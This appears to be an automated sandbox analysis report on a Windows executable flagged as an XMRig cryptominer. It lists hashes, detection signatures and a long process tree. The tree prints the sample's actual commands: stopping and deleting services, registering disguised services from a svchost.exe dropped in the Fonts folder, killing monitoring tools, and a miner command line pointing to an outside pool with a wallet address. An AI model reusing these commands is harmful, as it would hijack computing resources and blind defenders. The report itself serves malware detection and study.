Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22/05/2024, 15:02

General

  • Target

    67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe

  • Size

    1.5MB

  • MD5

    67aa4626a523e1eac3b90552be1cd4ad

  • SHA1

    9eb3bd7d1131a820a87b20a1631bc7b6bf9140c9

  • SHA256

    ec4438d1b316a2d106e5070cc7881f9f9d9bcfaf51614bf1c768cc374bdc4ae2

  • SHA512

    bfc6c4098a1c550ee41544b084eb0d2488577e656b5106a445a553a37a7a80e6b8a84be7f1467d3ca6c31046191f32c4feae31a56c5e16093b71fec7ea7d37de

  • SSDEEP

    24576:+c/nsodv5hQpu6q8K8MZLQJTkeOfAn/RZDtbQLf7u+YAgNdwuL8wmKiVME:/nHB5hYb4x2ftbQ2+owugwE9

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 12 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 6 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\SysWOW64\attrib.exe
        attrib -s -h -r -a C:\Windows\Fonts
        3⤵
        • Views/modifies file attributes
        PID:4864
    • C:\Windows\SysWOW64\net.exe
      net stop Microsarver
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3620
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop Microsarver
        3⤵
          PID:5112
      • C:\Windows\SysWOW64\sc.exe
        sc delete Microsarver
        2⤵
        • Launches sc.exe
        PID:3660
      • C:\Windows\SysWOW64\net.exe
        net stop Samsorver
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1892
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop Samsorver
          3⤵
            PID:1812
        • C:\Windows\SysWOW64\sc.exe
          sc delete Samsorver
          2⤵
          • Launches sc.exe
          PID:4128
        • C:\Windows\SysWOW64\net.exe
          net stop lanmanserver /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1584
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop lanmanserver /y
            3⤵
              PID:4516
          • C:\Windows\SysWOW64\sc.exe
            sc config lanmanserver start= DISABLED 2>nul
            2⤵
            • Launches sc.exe
            PID:3636
          • C:\Windows\SysWOW64\sc.exe
            sc delete lanmanserver
            2⤵
            • Launches sc.exe
            PID:1088
          • C:\Windows\SysWOW64\net.exe
            net stop mssecsvc2.0
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:512
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop mssecsvc2.0
              3⤵
                PID:4632
            • C:\Windows\SysWOW64\sc.exe
              sc delete mssecsvc2.0
              2⤵
              • Launches sc.exe
              PID:4080
            • C:\Windows\SysWOW64\net.exe
              net stop mssecsvc2.1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1588
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop mssecsvc2.1
                3⤵
                  PID:4460
              • C:\Windows\SysWOW64\sc.exe
                sc delete mssecsvc2.1
                2⤵
                • Launches sc.exe
                PID:3980
              • \??\c:\windows\Fonts\svchost.exe
                c:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe
                2⤵
                • Executes dropped EXE
                PID:4336
              • \??\c:\windows\Fonts\svchost.exe
                c:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service
                2⤵
                • Executes dropped EXE
                PID:4916
              • \??\c:\windows\Fonts\svchost.exe
                c:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.
                2⤵
                • Executes dropped EXE
                PID:2604
              • \??\c:\windows\Fonts\svchost.exe
                c:\windows\Fonts\svchost.exe start Microsarver
                2⤵
                • Executes dropped EXE
                PID:4980
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
                2⤵
                • Deletes itself
                PID:4948
            • \??\c:\windows\Fonts\svchost.exe
              c:\windows\Fonts\svchost.exe
              1⤵
              • Executes dropped EXE
              PID:3420
              • \??\c:\windows\Fonts\conhost.exe
                "c:\windows\Fonts\conhost.exe"
                2⤵
                • Executes dropped EXE
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4824
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
                  3⤵
                    PID:1984
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib -s -h -r -a C:\Windows\Fonts
                      4⤵
                      • Views/modifies file attributes
                      PID:740
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c attrib +s +a %SystemRoot%\Fonts
                    3⤵
                      PID:4176
                      • C:\Windows\SysWOW64\attrib.exe
                        attrib +s +a C:\Windows\Fonts
                        4⤵
                        • Drops file in Windows directory
                        • Views/modifies file attributes
                        PID:868
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c taskkill /im taskmgr.exe /f /T
                      3⤵
                        PID:4788
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im taskmgr.exe /f /T
                          4⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2808
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c taskkill /im rundll32.exe /f /T
                        3⤵
                          PID:3520
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im rundll32.exe /f /T
                            4⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:880
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c taskkill /im autoruns.exe /f /T
                          3⤵
                            PID:4976
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im autoruns.exe /f /T
                              4⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3516
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c taskkill /im perfmon.exe /f /T
                            3⤵
                              PID:2256
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im perfmon.exe /f /T
                                4⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2596
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c taskkill /im procexp.exe /f /T
                              3⤵
                                PID:3044
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im procexp.exe /f /T
                                  4⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4416
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c taskkill /im ProcessHacker.exe /f /T
                                3⤵
                                  PID:2620
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im ProcessHacker.exe /f /T
                                    4⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2712
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
                                  3⤵
                                    PID:2396
                                    • C:\Windows\SysWOW64\attrib.exe
                                      attrib -s -h -r -a C:\Windows\Fonts
                                      4⤵
                                      • Drops file in Windows directory
                                      PID:2916
                                  • \??\c:\windows\Fonts\svchost.exe
                                    c:\windows\Fonts\svchost.exe install Samsorver KvMonXP -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash
                                    3⤵
                                    • Executes dropped EXE
                                    PID:1012
                                  • \??\c:\windows\Fonts\svchost.exe
                                    c:\windows\Fonts\svchost.exe set Samsorver DisplayName WMI Performance Services
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4584
                                  • \??\c:\windows\Fonts\svchost.exe
                                    c:\windows\Fonts\svchost.exe set Samsorver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
                                    3⤵
                                    • Executes dropped EXE
                                    PID:3620
                                  • \??\c:\windows\Fonts\svchost.exe
                                    c:\windows\Fonts\svchost.exe start Samsorver
                                    3⤵
                                    • Executes dropped EXE
                                    PID:556
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                    3⤵
                                      PID:2740
                                      • C:\Windows\SysWOW64\attrib.exe
                                        attrib +s +a C:\Windows\Fonts
                                        4⤵
                                        • Views/modifies file attributes
                                        PID:2608
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                      3⤵
                                        PID:760
                                        • C:\Windows\SysWOW64\attrib.exe
                                          attrib +s +a C:\Windows\Fonts
                                          4⤵
                                            PID:2008
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                          3⤵
                                            PID:4224
                                            • C:\Windows\SysWOW64\attrib.exe
                                              attrib +s +a C:\Windows\Fonts
                                              4⤵
                                              • Drops file in Windows directory
                                              PID:3504
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                            3⤵
                                              PID:3492
                                              • C:\Windows\SysWOW64\attrib.exe
                                                attrib +s +a C:\Windows\Fonts
                                                4⤵
                                                • Drops file in Windows directory
                                                • Views/modifies file attributes
                                                PID:1728
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                              3⤵
                                                PID:3716
                                                • C:\Windows\SysWOW64\attrib.exe
                                                  attrib +s +a C:\Windows\Fonts
                                                  4⤵
                                                  • Drops file in Windows directory
                                                  PID:404
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                3⤵
                                                  PID:2312
                                                  • C:\Windows\SysWOW64\attrib.exe
                                                    attrib +s +a C:\Windows\Fonts
                                                    4⤵
                                                    • Views/modifies file attributes
                                                    PID:1484
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                  3⤵
                                                    PID:1012
                                                    • C:\Windows\SysWOW64\attrib.exe
                                                      attrib +s +a C:\Windows\Fonts
                                                      4⤵
                                                      • Views/modifies file attributes
                                                      PID:4128
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                    3⤵
                                                      PID:4272
                                                      • C:\Windows\SysWOW64\attrib.exe
                                                        attrib +s +a C:\Windows\Fonts
                                                        4⤵
                                                        • Views/modifies file attributes
                                                        PID:3724
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                      3⤵
                                                        PID:2724
                                                        • C:\Windows\SysWOW64\attrib.exe
                                                          attrib +s +a C:\Windows\Fonts
                                                          4⤵
                                                          • Drops file in Windows directory
                                                          • Views/modifies file attributes
                                                          PID:3284
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                        3⤵
                                                          PID:2568
                                                          • C:\Windows\SysWOW64\attrib.exe
                                                            attrib +s +a C:\Windows\Fonts
                                                            4⤵
                                                            • Drops file in Windows directory
                                                            PID:3996
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                          3⤵
                                                            PID:4812
                                                            • C:\Windows\SysWOW64\attrib.exe
                                                              attrib +s +a C:\Windows\Fonts
                                                              4⤵
                                                                PID:440
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                              3⤵
                                                                PID:5088
                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                  attrib +s +a C:\Windows\Fonts
                                                                  4⤵
                                                                    PID:740
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                  3⤵
                                                                    PID:3868
                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                      attrib +s +a C:\Windows\Fonts
                                                                      4⤵
                                                                      • Views/modifies file attributes
                                                                      PID:4412
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                    3⤵
                                                                      PID:4556
                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                        attrib +s +a C:\Windows\Fonts
                                                                        4⤵
                                                                        • Drops file in Windows directory
                                                                        PID:2536
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                      3⤵
                                                                        PID:3652
                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                          attrib +s +a C:\Windows\Fonts
                                                                          4⤵
                                                                            PID:3168
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                          3⤵
                                                                            PID:4356
                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                              attrib +s +a C:\Windows\Fonts
                                                                              4⤵
                                                                                PID:4332
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                              3⤵
                                                                                PID:3784
                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                  4⤵
                                                                                    PID:4600
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                  3⤵
                                                                                    PID:4940
                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                      4⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:3648
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                    3⤵
                                                                                      PID:3768
                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                        4⤵
                                                                                        • Views/modifies file attributes
                                                                                        PID:4972
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                      3⤵
                                                                                        PID:4496
                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                          4⤵
                                                                                            PID:2396
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                          3⤵
                                                                                            PID:224
                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                              4⤵
                                                                                              • Drops file in Windows directory
                                                                                              PID:5112
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                            3⤵
                                                                                              PID:4888
                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                4⤵
                                                                                                  PID:2512
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                3⤵
                                                                                                  PID:1052
                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                    4⤵
                                                                                                      PID:4780
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                    3⤵
                                                                                                      PID:2180
                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                        4⤵
                                                                                                          PID:5008
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                        3⤵
                                                                                                          PID:3720
                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                            4⤵
                                                                                                            • Views/modifies file attributes
                                                                                                            PID:4224
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                          3⤵
                                                                                                            PID:2944
                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                              4⤵
                                                                                                                PID:4412
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                              3⤵
                                                                                                                PID:4712
                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                  4⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Views/modifies file attributes
                                                                                                                  PID:4956
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                3⤵
                                                                                                                  PID:1172
                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                    4⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    PID:3492
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                  3⤵
                                                                                                                    PID:3444
                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                      4⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Views/modifies file attributes
                                                                                                                      PID:3304
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                    3⤵
                                                                                                                      PID:2392
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                        4⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:2620
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                      3⤵
                                                                                                                        PID:2264
                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                          4⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          PID:4464
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                        3⤵
                                                                                                                          PID:3476
                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                            4⤵
                                                                                                                              PID:1204
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                            3⤵
                                                                                                                              PID:4128
                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                4⤵
                                                                                                                                  PID:3532
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                3⤵
                                                                                                                                  PID:2452
                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                    4⤵
                                                                                                                                    • Views/modifies file attributes
                                                                                                                                    PID:4536
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                  3⤵
                                                                                                                                    PID:868
                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                      4⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:1312
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                    3⤵
                                                                                                                                      PID:2724
                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                        4⤵
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:2880
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                      3⤵
                                                                                                                                        PID:4816
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                          4⤵
                                                                                                                                            PID:5088
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                          3⤵
                                                                                                                                            PID:384
                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                              4⤵
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              • Views/modifies file attributes
                                                                                                                                              PID:1476
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                            3⤵
                                                                                                                                              PID:3064
                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                4⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                PID:1928
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                              3⤵
                                                                                                                                                PID:2476
                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                  4⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:3792
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                3⤵
                                                                                                                                                  PID:3492
                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                    4⤵
                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                    PID:760
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3396
                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                      4⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      PID:880
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3612
                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                        4⤵
                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                        PID:2620
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2260
                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                          4⤵
                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                          PID:4348
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3024
                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                            4⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            PID:3148
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1204
                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                              4⤵
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              PID:4508
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4336
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          PID:1012
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:3592
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Views/modifies file attributes
          PID:3724
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:4272
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          PID:5100
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:4232
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          • Views/modifies file attributes
          PID:2896
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:4980
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          PID:4388
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:5064
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          • Views/modifies file attributes
          PID:3320
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:2128
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          • Views/modifies file attributes
          PID:1096
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:2212
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          PID:468
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:3068
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          PID:2524
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:4856
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          PID:2752
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:2016
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          PID:2504
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:4936
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          PID:1016
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
      3⤵
      PID:1636
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +a C:\Windows\Fonts
          4⤵
          • Drops file in Windows directory
          PID:1068
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib +s +a %SystemRoot%\Fonts
